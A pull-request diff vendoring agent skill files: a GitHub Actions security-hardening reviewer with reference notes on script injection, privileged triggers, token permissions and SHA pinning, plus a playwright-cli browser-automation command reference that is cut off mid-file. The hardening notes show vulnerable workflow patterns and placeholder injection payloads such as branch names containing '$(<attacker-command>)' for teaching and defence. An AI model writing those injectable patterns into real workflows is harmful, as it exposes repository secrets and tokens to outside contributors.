### PR TITLE
Vendor agent skills with gh skill and update them weekly

### DIFF
--- a/.agents/skills/github-actions-hardening/SKILL.md
+++ b/.agents/skills/github-actions-hardening/SKILL.md
@@ -1,0 +1,164 @@
+---
+description: Security hardening reviewer for GitHub Actions workflow files (.github/workflows/*.yml). Reasons about the Actions threat model that pattern matchers and general code linters miss — untrusted-input script injection, privileged triggers running fork code, mutable action references, and over-scoped tokens. Use this skill when asked to review, audit, harden, or secure a GitHub Actions workflow, when writing a new workflow, or for any request like "is this workflow safe?", "review my CI for security issues", "why is pull_request_target dangerous here?", "pin my actions", or "lock down GITHUB_TOKEN permissions". Covers script injection via ${{ }} interpolation, pull_request_target / workflow_run privilege escalation, SHA-pinning of third-party actions, least-privilege permissions, GITHUB_ENV/GITHUB_OUTPUT injection, secret exposure, OIDC over long-lived credentials, and self-hosted runner exposure on public repositories.
+metadata:
+    github-path: skills/github-actions-hardening
+    github-ref: refs/heads/main
+    github-repo: https://github.com/github/awesome-copilot
+    github-tree-sha: 25d75a622f5f8c034be5b25bf6585850d6f7fcd7
+name: github-actions-hardening
+---
+# GitHub Actions Hardening
+
+A focused security reviewer for GitHub Actions workflows. It reasons about the *Actions-specific*
+threat model — where trust boundaries live in trigger types, token scopes, and string
+interpolation — rather than the application-code vulnerabilities a general security scanner looks
+for. Most workflow risks are invisible to language linters because the dangerous code is the YAML
+itself and the way GitHub expands `${{ }}` expressions into a shell before your script runs.
+
+## When to Use This Skill
+
+Use this skill when the request involves:
+
+* Reviewing, auditing, or hardening any file under `.github/workflows/`
+* Authoring a new workflow and wanting it secure by default
+* A workflow that uses `pull_request_target`, `workflow_run`, or `issue_comment` triggers
+* Questions about `GITHUB_TOKEN` permissions or the `permissions:` key
+* Pinning actions to commit SHAs vs tags vs branches
+* Handling untrusted input (issue titles, PR bodies, branch names, commit messages) in `run:` steps
+* OIDC / cloud authentication from Actions, or secret handling in CI
+* Self-hosted runners on public repositories
+* Any request like "is this workflow safe?", "secure my CI", or "review this GitHub Action"
+
+## The Core Insight
+
+In a workflow, **`${{ <expr> }}` is expanded by the runner into the script *before* the shell
+executes it.** So a step like:
+
+```yaml
+- run: echo "Title: ${{ github.event.issue.title }}"
+```
+
+is not passing a variable — it is *pasting attacker-controlled text directly into your shell
+command*. An issue titled `"; <attacker-command> #` is concatenated into the script and executed.
+This single mechanism is the most common real-world Actions vulnerability, and models routinely
+generate it. Treat every
+`${{ }}` that contains data an outside contributor can influence as a code-injection sink.
+
+## Execution Workflow
+
+Follow these steps **in order** for every workflow reviewed.
+
+### Step 1 — Map the Triggers and Trust Level
+
+Read every `on:` trigger and classify the workflow's privilege:
+
+* `push`, `pull_request` (from same repo) → runs with the contributor's own trust
+* `pull_request` from a **fork** → runs with a **read-only** token, **no secrets** (safe by design)
+* `pull_request_target`, `workflow_run`, `issue_comment`, `issues` → run in the context of the
+  **base repository** with a **read/write token and full access to secrets**, but can be
+  **triggered by outside contributors**. These are the dangerous triggers.
+
+Read `references/triggers-and-privilege.md` for the full trust matrix.
+
+### Step 2 — Hunt for Script Injection
+
+For every `run:` block, every `script:` in `actions/github-script`, and every input to a custom
+action, list the `${{ }}` expressions and check whether any resolve to attacker-controllable data.
+High-risk contexts include:
+
+* `github.event.issue.title`, `github.event.issue.body`
+* `github.event.pull_request.title`, `github.event.pull_request.body`, `.head.ref`, `.head.label`
+* `github.event.comment.body`, `github.event.review.body`
+* `github.event.pages.*.page_name`, `github.event.commits.*.message`, `github.event.head_commit.*`
+* `github.head_ref` and any `github.event.*` field a fork author can set
+
+Read `references/injection.md` for the complete sink list and the safe-pattern fixes.
+
+### Step 3 — Check Privileged Triggers Don't Execute Untrusted Code
+
+If a `pull_request_target` or `workflow_run` workflow checks out PR/fork code
+(`ref: ${{ github.event.pull_request.head.sha }}`) **and then runs it** (build, test, install
+scripts, `npm install` with lifecycle scripts, etc.), that is remote code execution against a
+privileged token. Flag it as CRITICAL. The safe pattern is to split into two workflows: an
+unprivileged `pull_request` workflow that runs the untrusted code, and a privileged
+`workflow_run` workflow that only consumes its results.
+
+### Step 4 — Audit `permissions:`
+
+* If there is **no** `permissions:` block, the workflow inherits the repository default, which may
+  be read/write to everything. Flag it.
+* Recommend a top-level `permissions: {}` (deny-all) or `contents: read`, then grant the minimum
+  per job (e.g. `pull-requests: write` only on the job that comments).
+* Flag any `permissions: write-all` or broad `write` scopes that the steps don't actually need.
+
+Read `references/permissions-and-tokens.md` for the per-scope guidance and OIDC setup.
+
+### Step 5 — Audit Action References (Supply Chain)
+
+For every `uses:`:
+
+* **Third-party actions** (not `actions/*` or `github/*`) MUST be pinned to a full 40-character
+  commit SHA, not a tag or branch. Tags and branches are mutable; a compromised upstream action
+  can rewrite `v1` to malicious code that runs with your token and secrets.
+* First-party `actions/*` are lower risk but SHA-pinning is still the hardened recommendation.
+* Flag `@main`, `@master`, or any branch reference as HIGH — that is "latest" and can change under
+  you at any time.
+* Note the human-readable version in a trailing comment: `uses: foo/bar@<sha> # v2.1.0`.
+
+Read `references/supply-chain.md` for pinning, Dependabot for actions, and artifact/cache risks.
+
+### Step 6 — Check Secret and Output Handling
+
+* No secrets echoed, printed, or written to logs; no `set -x` / `bash -x` in steps that touch
+  secrets.
+* Secrets must not be passed to steps that run untrusted code or to untrusted third-party actions.
+* Untrusted multiline data written to `$GITHUB_ENV` or `$GITHUB_OUTPUT` can inject environment
+  variables or step outputs — use the random-delimiter heredoc form and never write raw user input.
+* `actions/checkout` leaves a token on disk by default; set `persist-credentials: false` when the
+  job later runs untrusted code.
+
+### Step 7 — Produce the Report
+
+Output findings using the format in `references/report-format.md`: a severity summary table first,
+then grouped findings with file, the exact offending YAML, the risk in plain English, and a
+concrete before/after fix. Never auto-apply changes — present them for review.
+
+## Severity Guide
+
+| Severity | Meaning | Example |
+| --- | --- | --- |
+| 🔴 CRITICAL | Token/secret theft or RCE reachable by an outside contributor | `pull_request_target` checking out and running fork code; `${{ github.event.* }}` in a `run:` on a privileged trigger |
+| 🟠 HIGH | Exploitable supply-chain or scope problem | Third-party action on a mutable tag/branch; `write-all` permissions; injection sink on `issue_comment` |
+| 🟡 MEDIUM | Risk under conditions or chaining | Missing `permissions:` block; secret reachable by a non-fork PR author |
+| 🔵 LOW | Hardening gap, low direct risk | First-party action not SHA-pinned; `persist-credentials` left default on a non-privileged job |
+| ⚪ INFO | Observation, not a vulnerability | Version comment missing next to a pinned SHA |
+
+## Output Rules
+
+* **Always** show a findings summary table (counts by severity) first.
+* **Group by issue type**, not by file.
+* **Be exact** — quote the offending line and give the line location.
+* **Always** pair every CRITICAL/HIGH with a concrete corrected YAML snippet.
+* **Never** claim a fork `pull_request` is dangerous just because it runs untrusted code — it has
+  no secrets and a read-only token. Reserve CRITICAL for the privileged triggers.
+* If the workflow is already hardened, say so and list what was checked.
+
+## Reference Files
+
+Load these as needed:
+
+* `references/triggers-and-privilege.md` — Trust matrix for every trigger, why `pull_request_target`
+  and `workflow_run` are privileged, and the two-workflow safe pattern.
+  + Search patterns: `pull_request_target`, `workflow_run`, `issue_comment`, `fork`, `secrets`, `read-only token`, `trust boundary`
+* `references/injection.md` — Full list of attacker-controllable `${{ }}` contexts and the
+  `env:`-variable safe pattern for each sink (`run`, `github-script`, action inputs).
+  + Search patterns: `script injection`, `github.event`, `head_ref`, `issue title`, `env`, `intermediate variable`, `actions/github-script`
+* `references/permissions-and-tokens.md` — `GITHUB_TOKEN` scopes, least-privilege `permissions:`
+  recipes per job type, and OIDC for cloud auth instead of long-lived secrets.
+  + Search patterns: `permissions`, `GITHUB_TOKEN`, `write-all`, `contents: read`, `id-token`, `OIDC`, `least privilege`
+* `references/supply-chain.md` — SHA-pinning third-party actions, Dependabot for `github-actions`,
+  artifact and cache poisoning across `workflow_run`, and self-hosted runner exposure.
+  + Search patterns: `SHA pin`, `uses`, `mutable tag`, `Dependabot`, `download-artifact`, `cache`, `self-hosted runner`
+* `references/report-format.md` — Output template: summary table, finding cards, and before/after
+  remediation blocks.
+  + Search patterns: `report`, `format`, `finding`, `summary`, `remediation`, `before`, `after`

--- a/.agents/skills/github-actions-hardening/references/injection.md
+++ b/.agents/skills/github-actions-hardening/references/injection.md
@@ -1,0 +1,86 @@
+# Script Injection
+
+`${{ <expr> }}` is substituted into the script **as text, before the shell runs**. Any expression
+that resolves to data an outside contributor controls is therefore a command-injection sink.
+
+## Attacker-Controllable Contexts
+
+These can be set by anyone who can open an issue, PR, or comment:
+
+| Context | Set by |
+| --- | --- |
+| `github.event.issue.title` / `.body` | Issue author |
+| `github.event.pull_request.title` / `.body` | PR author |
+| `github.event.pull_request.head.ref` / `.head.label` | PR author (branch name) |
+| `github.head_ref` | PR author (branch name) |
+| `github.event.comment.body` | Commenter |
+| `github.event.review.body` / `.review_comment.body` | Reviewer |
+| `github.event.commits.*.message` / `head_commit.message` | Commit author |
+| `github.event.commits.*.author.email` / `.name` | Commit author |
+| `github.event.pages.*.page_name` | Wiki editor |
+
+A branch named `$(<attacker-command>)` or an issue titled `"; <attacker-command> #` becomes shell
+when interpolated into a `run:` step.
+
+## The Vulnerable Pattern
+
+```yaml
+# VULNERABLE
+- run: |
+    echo "Reviewing PR: ${{ github.event.pull_request.title }}"
+    git checkout ${{ github.head_ref }}
+```
+
+## The Safe Pattern — Pass Through `env:`
+
+Bind the untrusted value to an environment variable, then reference the *shell* variable (quoted).
+The shell variable is data, never re-parsed as workflow syntax:
+
+```yaml
+# SAFE
+- env:
+    PR_TITLE: ${{ github.event.pull_request.title }}
+    HEAD_REF: ${{ github.head_ref }}
+  run: |
+    echo "Reviewing PR: $PR_TITLE"
+    git checkout "$HEAD_REF"
+```
+
+`${{ }}` now appears only on the `env:` side, where it is assigned as a value rather than spliced
+into a command. Always quote the shell variable (`"$PR_TITLE"`) to prevent word-splitting and
+globbing.
+
+## `actions/github-script`
+
+The same rule applies. Do not interpolate `${{ }}` into the `script:` body — pass it through the
+environment and read `process.env`:
+
+```yaml
+# VULNERABLE
+- uses: actions/github-script@<sha>
+  with:
+    script: console.log("${{ github.event.issue.title }}")
+
+# SAFE
+- uses: actions/github-script@<sha>
+  env:
+    TITLE: ${{ github.event.issue.title }}
+  with:
+    script: console.log(process.env.TITLE)
+```
+
+## Custom Action Inputs
+
+Passing untrusted `${{ }}` into a composite or JS action's `with:` inputs can be safe or not
+depending on whether the action itself interpolates the input into a shell. When in doubt, pass via
+`env:` and have the action read the environment, or sanitize/validate first (e.g. a branch name
+should match `^[A-Za-z0-9._/-]+$`).
+
+## Quick Audit Checklist
+
+1. Grep every `run:` and `script:` for `${{`.
+2. For each, resolve what the expression points to.
+3. If it can be set by a non-collaborator → rewrite via `env:` with a quoted shell variable.
+4. `github.actor`, `github.repository`, `github.sha`, `github.ref` (for branch protection contexts)
+   and similar server-controlled values are not attacker-set, but a defense-in-depth `env:` rewrite
+   costs nothing.

--- a/.agents/skills/github-actions-hardening/references/permissions-and-tokens.md
+++ b/.agents/skills/github-actions-hardening/references/permissions-and-tokens.md
@@ -1,0 +1,76 @@
+# Permissions and Tokens
+
+Every workflow run gets an automatic `GITHUB_TOKEN`. Its scope is the blast radius if a step is
+compromised, so scope it to the minimum.
+
+## The Default Is Too Broad
+
+If a workflow has no `permissions:` block, it inherits the repository/organization default. On
+older or permissive repos that default is **read/write to most scopes**. A single injected command
+or malicious dependency then runs with the ability to push code, publish releases, or approve PRs.
+
+## Least-Privilege Recipe
+
+Set a restrictive default at the top level, then elevate per job only where needed.
+
+```yaml
+# Deny by default
+permissions: {}
+
+jobs:
+  build:
+    permissions:
+      contents: read          # checkout only
+    runs-on: ubuntu-latest
+    steps: [...]
+
+  comment:
+    permissions:
+      contents: read
+      pull-requests: write    # this job posts a comment; nothing else
+    runs-on: ubuntu-latest
+    steps: [...]
+```
+
+Common scopes: `contents`, `pull-requests`, `issues`, `actions`, `packages`, `id-token`,
+`deployments`, `checks`, `statuses`. Each is `read`, `write`, or `none`.
+
+## Findings to Flag
+
+* No `permissions:` block anywhere → MEDIUM (inherits possibly-broad default).
+* `permissions: write-all` → HIGH.
+* A `write` scope the job's steps never use → HIGH (drop it).
+* Top-level `write` that should live on one job → MEDIUM (move it down).
+
+## OIDC Instead of Long-Lived Cloud Secrets
+
+Storing static cloud keys (`AWS_ACCESS_KEY_ID`, etc.) as repo secrets means a leak is permanent
+until manually rotated. Prefer OpenID Connect: the workflow requests a short-lived token the cloud
+provider trusts, scoped to that repo/branch, expiring in minutes.
+
+```yaml
+permissions:
+  id-token: write     # required to request the OIDC token
+  contents: read
+jobs:
+  deploy:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: aws-actions/configure-aws-credentials@<sha>
+        with:
+          role-to-assume: arn:aws:iam::123456789012:role/my-ci-role
+          aws-region: us-east-1
+      # no AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets needed
+```
+
+The same pattern exists for Azure (`azure/login`), GCP (`google-github-actions/auth`), HashiCorp
+Vault, and others. On the cloud side, scope the trust policy to the specific repo and ideally a
+specific branch/environment so a fork or another repo cannot assume the role.
+
+## Secret Hygiene
+
+* Reference secrets only in the jobs that need them.
+* Never `echo` a secret or enable shell tracing (`set -x`) in a step that handles one.
+* Don't pass secrets into third-party actions you haven't pinned and reviewed.
+* Remember fork `pull_request` runs get no secrets — don't try to "fix" that by switching to
+  `pull_request_target` (see `triggers-and-privilege.md`).

--- a/.agents/skills/github-actions-hardening/references/report-format.md
+++ b/.agents/skills/github-actions-hardening/references/report-format.md
@@ -1,0 +1,65 @@
+# Report Format
+
+Use this structure for every workflow hardening review.
+
+## 1. Summary Table (always first)
+
+```
+GitHub Actions Hardening — <workflow file(s) reviewed>
+
+| Severity   | Count |
+| ---------- | ----- |
+| 🔴 CRITICAL | 1     |
+| 🟠 HIGH     | 2     |
+| 🟡 MEDIUM   | 1     |
+| 🔵 LOW      | 1     |
+| ⚪ INFO     | 0     |
+```
+
+If nothing was found: `No issues found. Checked: triggers, injection sinks, permissions, action
+pinning, secret handling.`
+
+## 2. Findings (grouped by issue type, not by file)
+
+For each finding use a card:
+
+```
+### 🔴 CRITICAL — Script injection via PR title on a privileged trigger
+
+File: .github/workflows/triage.yml  (line 14)
+Trigger: pull_request_target
+
+Offending code:
+    - run: echo "New PR: ${{ github.event.pull_request.title }}"
+
+Risk: pull_request_target runs with a read/write token and repository secrets, and any
+contributor can open a PR with a title like  "; <attacker-command> #  which is executed as shell.
+This allows secret exfiltration and pushes with the workflow token.
+
+Fix:
+    - env:
+        PR_TITLE: ${{ github.event.pull_request.title }}
+      run: echo "New PR: $PR_TITLE"
+
+Confidence: High
+```
+
+## 3. Remediation Blocks
+
+Every CRITICAL and HIGH finding includes a concrete before/after. Preserve the author's
+indentation, step names, and surrounding structure — change only what fixes the issue, and add a
+one-line comment explaining the change where it isn't obvious.
+
+## 4. Closing Note
+
+End with the explicit line:
+
+> Review each change before committing. Nothing has been modified.
+
+## Style Rules
+
+* Quote the exact offending line and give its location.
+* Explain risk in plain English — what an attacker actually does, not just the rule name.
+* Per-finding confidence: High / Medium / Low.
+* Don't inflate severity: a fork `pull_request` (read-only token, no secrets) running untrusted
+  code is not CRITICAL on its own.

--- a/.agents/skills/github-actions-hardening/references/supply-chain.md
+++ b/.agents/skills/github-actions-hardening/references/supply-chain.md
@@ -1,0 +1,71 @@
+# Supply Chain
+
+A workflow runs other people's code every time it `uses:` an action. Those actions execute with
+your token and (on privileged triggers) your secrets, so their integrity is your integrity.
+
+## Pin Third-Party Actions to a Commit SHA
+
+Tags (`@v4`) and branches (`@main`) are **mutable** — the upstream owner (or anyone who compromises
+them) can repoint them to new code without you changing a line. A full 40-character commit SHA is
+immutable.
+
+```yaml
+# Mutable — the tag can be moved to malicious code
+- uses: some-org/some-action@v3
+
+# Pinned — this exact tree, forever
+- uses: some-org/some-action@3f1e0a9c8b7d6e5f4a3b2c1d0e9f8a7b6c5d4e3f # v3.2.1
+```
+
+Rules:
+
+* Third-party actions (anything not `actions/*` or `github/*`) → **MUST** be SHA-pinned. Flag tags
+  and branches as HIGH.
+* `@main` / `@master` → HIGH regardless of publisher; that is unversioned "latest".
+* First-party `actions/*` → SHA-pinning is the hardened recommendation (LOW if only tag-pinned).
+* Keep a trailing `# vX.Y.Z` comment so humans and Dependabot can read the intended version.
+
+This is not theoretical: real incidents have seen popular actions' tags repointed to code that
+exfiltrated secrets from every workflow that referenced the mutable tag.
+
+## Let Dependabot Update the Pins
+
+SHA pins go stale. Enable Dependabot for the `github-actions` ecosystem so updates arrive as
+reviewable PRs (it understands the `# vX.Y.Z` comment and bumps the SHA):
+
+```yaml
+# .github/dependabot.yml
+version: 2
+updates:
+  - package-ecosystem: github-actions
+    directory: /
+    schedule:
+      interval: weekly
+```
+
+## Artifact and Cache Poisoning
+
+* An artifact uploaded by an untrusted `pull_request` build is **untrusted data**. A privileged
+  `workflow_run` may download it, but must treat it as data only — never execute it, and validate
+  paths when extracting (a crafted artifact can contain `../` path-traversal entries).
+* Caches are keyed and can be populated by less-privileged runs; do not trust cached build outputs
+  to be untampered in a privileged context.
+
+## Self-Hosted Runners on Public Repos
+
+Default (GitHub-hosted) runners are ephemeral — a fresh VM per job, destroyed after. **Self-hosted
+runners persist**, so untrusted fork PR code running on one can:
+
+* Leave behind tools/backdoors for the next job,
+* Read other repositories' checkouts or credentials on the same machine,
+* Pivot into your network.
+
+Never use self-hosted runners for workflows that public forks can trigger. If you must, use
+ephemeral, isolated, single-use runners and never expose secrets to fork-triggered jobs.
+
+## `checkout` Credential Persistence
+
+`actions/checkout` writes the token into `.git/config` by default so later `git` steps can push.
+If the job subsequently runs untrusted code, that code can read the token. Set
+`persist-credentials: false` when you don't need to push, especially before running build/test of
+untrusted code.

--- a/.agents/skills/github-actions-hardening/references/triggers-and-privilege.md
+++ b/.agents/skills/github-actions-hardening/references/triggers-and-privilege.md
@@ -1,0 +1,89 @@
+# Triggers and Privilege
+
+The single most important question for workflow security is: **can an outside contributor trigger
+this workflow, and if so, what token and secrets does it get?** GitHub answers this differently per
+trigger.
+
+## Trust Matrix
+
+| Trigger | Who can fire it | `GITHUB_TOKEN` | Secrets available | Risk |
+| --- | --- | --- | --- | --- |
+| `push` | Repo collaborators | read/write | yes | Low — trusted authors |
+| `pull_request` (same-repo branch) | Collaborators | read/write | yes | Low |
+| `pull_request` (from a fork) | **Anyone** | **read-only** | **no** | Low by design — even malicious code can't steal anything |
+| `pull_request_target` | **Anyone with a fork** | **read/write** | **yes** | **High** — runs in base-repo context |
+| `workflow_run` | Fires after another workflow | **read/write** | **yes** | **High** |
+| `issue_comment`, `issues` | **Anyone** | **read/write** | **yes** | **High** |
+
+The trap: `pull_request` from a fork is *safe* because GitHub deliberately strips the token down
+and withholds secrets. Maintainers who find that "the secrets don't work on fork PRs" often switch
+to `pull_request_target` to get them back — and in doing so hand a write token and every secret to
+arbitrary contributors.
+
+## Why `pull_request_target` Is Dangerous
+
+`pull_request_target` checks out the **base** repository's workflow definition (so a fork can't
+change what runs), but it runs with full privileges. The danger is when the workflow then
+explicitly checks out the **fork's** code and executes it:
+
+```yaml
+# DANGEROUS — RCE with a write token + secrets
+on: pull_request_target
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@<sha>
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}   # fork's code
+      - run: npm install && npm test                        # runs the fork's code + scripts
+```
+
+`npm install` alone runs arbitrary lifecycle scripts from the PR. With `pull_request_target` those
+scripts can read `secrets.*` and push commits with the write token.
+
+## The Safe Two-Workflow Pattern
+
+Split responsibilities. An **unprivileged** workflow runs the untrusted code; a **privileged**
+workflow consumes only the trusted *output*.
+
+```yaml
+# 1) Unprivileged: runs untrusted code, no secrets, read-only token
+name: PR Build
+on: pull_request
+permissions:
+  contents: read
+jobs:
+  build:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@<sha>
+      - run: npm ci && npm run build
+      - uses: actions/upload-artifact@<sha>
+        with: { name: pr, path: dist/ }
+```
+
+```yaml
+# 2) Privileged: triggered by the first, never runs fork code
+name: PR Comment
+on:
+  workflow_run:
+    workflows: ["PR Build"]
+    types: [completed]
+permissions:
+  pull-requests: write
+jobs:
+  comment:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/download-artifact@<sha>   # data only, not executed
+      # post results, using the trusted token — but never execute the artifact
+```
+
+## Rules
+
+* Treat `pull_request_target`, `workflow_run`, `issue_comment`, and `issues` as privileged.
+* In a privileged workflow, **never** check out and execute PR/fork code.
+* If you only need to label, comment, or triage based on metadata, that is fine — just don't run
+  the contributor's code.
+* Prefer `pull_request` (with its safe read-only/no-secrets defaults) whenever possible.

--- a/.agents/skills/playwright-cli/SKILL.md
+++ b/.agents/skills/playwright-cli/SKILL.md
@@ -1,0 +1,429 @@
+---
+allowed-tools: Bash(playwright-cli:*) Bash(npx:*) Bash(npm:*)
+description: Automate browser interactions, test web pages and work with Playwright tests.
+metadata:
+    github-path: skills/playwright-cli
+    github-ref: refs/tags/v0.1.19
+    github-repo: https://github.com/microsoft/playwright-cli
+    github-tree-sha: fe74b7fb02fe5d0697d1e1359cb44e1f48d1fc54
+name: playwright-cli
+---
+# Browser Automation with playwright-cli
+
+## Quick start
+
+```bash
+# open new browser
+playwright-cli open
+# navigate to a page
+playwright-cli goto https://playwright.dev
+# interact with the page using refs from the snapshot
+playwright-cli click e15
+playwright-cli type "page.click"
+playwright-cli press Enter
+# take a screenshot (rarely used, as snapshot is more common)
+playwright-cli screenshot
+# close the browser
+playwright-cli close
+```
+
+## Commands
+
+### Core
+
+```bash
+playwright-cli open
+# open and navigate right away
+playwright-cli open https://example.com/
+playwright-cli goto https://playwright.dev
+playwright-cli type "search query"
+playwright-cli click e3
+playwright-cli dblclick e7
+# --submit presses Enter after filling the element
+playwright-cli fill e5 "user@example.com"  --submit
+playwright-cli drag e2 e8
+# drop files or data onto an element (from outside the page)
+playwright-cli drop e4 --path=./image.png
+playwright-cli drop e4 --data="text/plain=hello world"
+playwright-cli hover e4
+playwright-cli select e9 "option-value"
+playwright-cli upload ./document.pdf
+playwright-cli check e12
+playwright-cli uncheck e12
+playwright-cli snapshot
+# search the snapshot for text or a regexp, returns matching nodes with surrounding context
+playwright-cli find "Sign in"
+playwright-cli find --regex "Sign (in|up)"
+# wrap the regexp in slashes to add flags, e.g. /i for case-insensitive
+playwright-cli find --regex "/sign (in|up)/i"
+playwright-cli eval "document.title"
+playwright-cli eval "el => el.textContent" e5
+# get element id, class, or any attribute not visible in the snapshot
+playwright-cli eval "el => el.id" e5
+playwright-cli eval "el => el.getAttribute('data-testid')" e5
+playwright-cli dialog-accept
+playwright-cli dialog-accept "confirmation text"
+playwright-cli dialog-dismiss
+playwright-cli resize 1920 1080
+playwright-cli close
+```
+
+### Navigation
+
+```bash
+playwright-cli go-back
+playwright-cli go-forward
+playwright-cli reload
+```
+
+### Keyboard
+
+```bash
+playwright-cli press Enter
+playwright-cli press ArrowDown
+playwright-cli keydown Shift
+playwright-cli keyup Shift
+```
+
+### Mouse
+
+```bash
+playwright-cli mousemove 150 300
+playwright-cli mousedown
+playwright-cli mousedown right
+playwright-cli mouseup
+playwright-cli mouseup right
+playwright-cli mousewheel 0 100
+```
+
+### Save as
+
+```bash
+playwright-cli screenshot
+playwright-cli screenshot e5
+playwright-cli screenshot --filename=page.png
+playwright-cli screenshot --hires
+playwright-cli pdf --filename=page.pdf
+```
+
+### Tabs
+
+```bash
+playwright-cli tab-list
+playwright-cli tab-new
+playwright-cli tab-new https://example.com/page
+playwright-cli tab-close
+playwright-cli tab-close 2
+playwright-cli tab-select 0
+```
+
+### Storage
+
+```bash
+playwright-cli state-save
+playwright-cli state-save auth.json
+playwright-cli state-load auth.json
+
+# Cookies
+playwright-cli cookie-list
+playwright-cli cookie-list --domain=example.com
+playwright-cli cookie-get session_id
+playwright-cli cookie-set session_id abc123
+playwright-cli cookie-set session_id abc123 --domain=example.com --httpOnly --secure
+playwright-cli cookie-delete session_id
+playwright-cli cookie-clear
+
+# LocalStorage
+playwright-cli localstorage-list
+playwright-cli localstorage-get theme
+playwright-cli localstorage-set theme dark
+playwright-cli localstorage-delete theme
+playwright-cli localstorage-clear
+
+# SessionStorage
+playwright-cli sessionstorage-list
+playwright-cli sessionstorage-get step
+playwright-cli sessionstorage-set step 3
+playwright-cli sessionstorage-delete step
+playwright-cli sessionstorage-clear
+```
+
+### Network
+
+```bash
+playwright-cli route "**/*.jpg" --status=404
+playwright-cli route "https://api.example.com/**" --body='{"mock": true}'
+playwright-cli route-list
+playwright-cli unroute "**/*.jpg"
+playwright-cli unroute
+```
+
+### DevTools
+
+```bash
+playwright-cli console
+playwright-cli console warning
+playwright-cli requests
+playwright-cli request 5
+playwright-cli run-code "async page => await page.context().grantPermissions(['geolocation'])"
+playwright-cli run-code --filename=script.js
+playwright-cli tracing-start
+playwright-cli tracing-stop
+
+# record user actions in the browser, print them as Playwright code on stop
+playwright-cli recording-start
+playwright-cli recording-stop
+
+playwright-cli video-start video.webm
+playwright-cli video-chapter "Chapter Title" --description="Details" --duration=2000
+playwright-cli video-stop
+
+# annotate each subsequent action (click, type, ...) with a callout naming the action and highlighting the target
+playwright-cli video-show-actions --duration=600 --position=top-right
+playwright-cli video-hide-actions
+
+# launch the dashboard for UI review / design feedback — user annotates the page, you receive the annotated screenshot, snapshot, and notes
+playwright-cli show --annotate
+
+# generate a Playwright locator for an element from its ref or selector
+playwright-cli generate-locator e5 --raw
+
+# show a persistent highlight overlay for an element, optionally with a custom style
+playwright-cli highlight e5
+playwright-cli highlight e5 --style="outline: 3px dashed red"
+# hide a single element highlight, or all page highlights when no target is given
+playwright-cli highlight e5 --hide
+playwright-cli highlight --hide
+```
+
+## Raw output
+
+The global `--raw` option strips page status, generated code, and snapshot sections from the output, returning only the result value. Use it to pipe command output into other tools. Commands that don't produce output return nothing.
+
+```bash
+playwright-cli --raw eval "JSON.stringify(performance.timing)" | jq '.loadEventEnd - .navigationStart'
+playwright-cli --raw eval "JSON.stringify([...document.querySelectorAll('a')].map(a => a.href))" > links.json
+playwright-cli --raw snapshot > before.yml
+playwright-cli click e5
+playwright-cli --raw snapshot > after.yml
+diff before.yml after.yml
+TOKEN=$(playwright-cli --raw cookie-get session_id)
+playwright-cli --raw localstorage-get theme
+```
+
+For structured output wrapping every reply as JSON, pass --json
+```bash
+playwright-cli list --json
+```
+
+## Open parameters
+```bash
+# Use specific browser when creating session
+playwright-cli open --browser=chrome
+playwright-cli open --browser=firefox
+playwright-cli open --browser=webkit
+playwright-cli open --browser=msedge
+
+# Emulate a generic mobile device (Pixel 10 for Chromium, iPhone 17 for WebKit).
+# Prefer this when a mobile layout is acceptable: mobile pages are usually
+# lighter, so snapshots are smaller and cheaper.
+playwright-cli open --mobile
+playwright-cli open --device="iPhone 15"
+
+# Use persistent profile (by default profile is in-memory)
+playwright-cli open --persistent
+# Use persistent profile with custom directory
+playwright-cli open --profile=/path/to/profile
+
+# Connect to browser via Playwright Extension
+playwright-cli attach --extension=chrome
+
+# Connect to a running Chrome or Edge by channel name
+playwright-cli attach --cdp=chrome
+playwright-cli attach --cdp=msedge
+
+# Connect to a running browser via CDP endpoint
+playwright-cli attach --cdp=http://localhost:9222
+
+# Start with config file
+playwright-cli open --config=my-config.json
+
+# Close the browser
+playwright-cli close
+# Detach from an attached browser (leaves the external browser running)
+playwright-cli -s=msedge detach
+# Delete user data for the default session
+playwright-cli delete-data
+```
+
+## URLs with `&` on Windows
+
+On Windows, `cmd.exe` and PowerShell treat `&` as a command separator, so URLs with multiple query parameters get truncated before `playwright-cli` runs. Escape `&` with `^&` in `cmd.exe`, or use `--%` in PowerShell:
+
+```batch
+playwright-cli goto "https://example.com/?a=1^&b=2"
+```
+
+```powershell
+playwright-cli --% goto "https://example.com/?a=1&b=2"
+```
+
+## Snapshots
+
+After each command, playwright-cli provides a snapshot of the current browser state.
+
+```bash
+> playwright-cli goto https://example.com
+### Page
+- Page URL: https://example.com/
+- Page Title: Example Domain
+### Snapshot
+[Snapshot](.playwright-cli/page-2026-02-14T19-22-42-679Z.yml)
+```
+
+You can also take a snapshot on demand using `playwright-cli snapshot` command. All the options below can be combined as needed.
+
+```bash
+# default - save to a file with timestamp-based name
+playwright-cli snapshot
+
+# save to file, use when snapshot is a part of the workflow result
+playwright-cli snapshot --filename=after-click.yaml
+
+# snapshot an element instead of the whole page
+playwright-cli snapshot "#main"
+
+# limit snapshot depth for efficiency, take a partial snapshot afterwards
+playwright-cli snapshot --depth=4
+playwright-cli snapshot e34
+
+# include each element's bounding box as [box=x,y,width,height]
+playwright-cli snapshot --boxes
+
+# search a large snapshot instead of capturing it all — returns matching nodes
+# with 3 lines of context around each match (like grep -C)
+playwright-cli find "Add to cart"
+playwright-cli find --regex "\\$[0-9]+\\.[0-9]{2}"
+```
+
+## Targeting elements
+
+By default, use refs from the snapshot to interact with page elements.
+
+```bash
+# get snapshot with refs
+playwright-cli snapshot
+
+# interact using a ref
+playwright-cli click e15
+```
+
+You can also use css selectors or Playwright locators.
+
+```bash
+# css selector
+playwright-cli click "#main > button.submit"
+
+# role locator
+playwright-cli click "getByRole('button', { name: 'Submit' })"
+
+# test id
+playwright-cli click "getByTestId('submit-button')"
+```
+
+## Browser Sessions
+
+```bash
+# create new browser session named "mysession" with persistent profile
+playwright-cli -s=mysession open example.com --persistent
+# same with manually specified profile directory (use when requested explicitly)
+playwright-cli -s=mysession open example.com --profile=/path/to/profile
+playwright-cli -s=mysession click e6
+playwright-cli -s=mysession close  # stop a named browser
+playwright-cli -s=mysession delete-data  # delete user data for persistent session
+
+playwright-cli list
+# Close all browsers
